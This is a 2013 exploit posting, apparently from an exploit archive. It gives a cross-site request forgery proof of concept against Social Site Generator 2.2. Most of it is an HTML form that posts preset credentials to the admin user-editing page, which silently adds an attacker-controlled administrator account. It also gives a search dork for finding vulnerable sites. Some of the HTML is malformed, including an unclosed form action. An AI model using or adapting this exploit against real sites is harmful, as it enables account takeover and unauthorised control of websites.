Social Site Generator 2.2 - CSRF Add Admin Exploit



# Exploit Title: social generator Remote Add Admin Exploit

# Date: 02/05/2013
# Author: Fallaga
#Script url:www.socialsitegeneratorscript.com
# Version: 2.2
# Tested on: Windows
# CVE : ()
# Dork: inurl:my_profile.php?user_id=MTM=
##################################################################################


<html>
<form method="post" action="
http://server/admin/edit_admin_user.php?eventid=10

                                    <td width="17%" align="left" nowrap
class="text"><strong>Username:</strong></td>
                                    <td width="83%"><table border="0"
cellspacing="0" cellpadding="2">
                                        <tr>
                                          <td nowrap align="left"><input
name="txt_username" type="text" value="JaMbA"/></td>
                                        </tr>
                                      </table></td>

                                  </tr>
  <tr>
                                    <td nowrap class="text"
align="left"><strong>Password:</strong></td>
                                    <td><table border="0" cellspacing="0"
cellpadding="2">
                                        <tr>
  <td nowrap align="left" class="text"><input name="txt_password"
type="password" value="abdotv"/></td>
                                        </tr>
                                      </table></td>

                                  </tr>
                                   <tr>
                                    <td nowrap class="text"
align="left"><strong>Confirm Password:</strong></td>
                                    <td><table border="0" cellspacing="0"
cellpadding="2">
                                        <tr>
  <td nowrap align="left" class="text"><input name="txt_cpassword"
type="password" value="abdotv"/></td>
                                        </tr>
                                      </table></td>

                                  </tr>

                                  <tr>

                                    <td></td>
                                  </tr>

                                  <tr>






                                  </tr>
                                  <tr>

                                    <td></td>
                                  </tr>

                                  <tr>

            </tr>

                                  <tr>


                                  </tr>

                                  <tr>
                                    <td valign="top"> </td>
                                    <td><table  border="0" cellspacing="0"
cellpadding="2">
                                        <tr>

                                          <td width="165" align="center">
                                          <input type="submit"
value="Submit" name="btn_submit" >
 </td>
                                          <td width="6"> </td>
                                        </tr>
                                      </table></td>
                                  </tr>
                                </table></td>
                            </tr>

                          </table></td>
                      </tr>
                    </table></td>
                </tr>
              </table>
            </form></td>
        </tr>
      </table></td>
  </tr>

  <tr>
    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="3%" align="left" background="images/layoutadmin_109.jpg"
style="background-repeat:repeat-x" ><img src="images/layoutadmin_108.jpg"
width="33" height="20" alt="" /></td>
        <td   background="images/layoutadmin_109.jpg"> </td>
        <td width="3%" align="right"
background="images/layoutadmin_109.jpg" style="background-repeat:repeat-x"
><img src="images/layoutadmin_111.jpg" width="33"  height="20" alt=""/></td>
      </tr>
</table></td>
  </tr>

</table>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++
Greetz: FaLLAGa Gov TN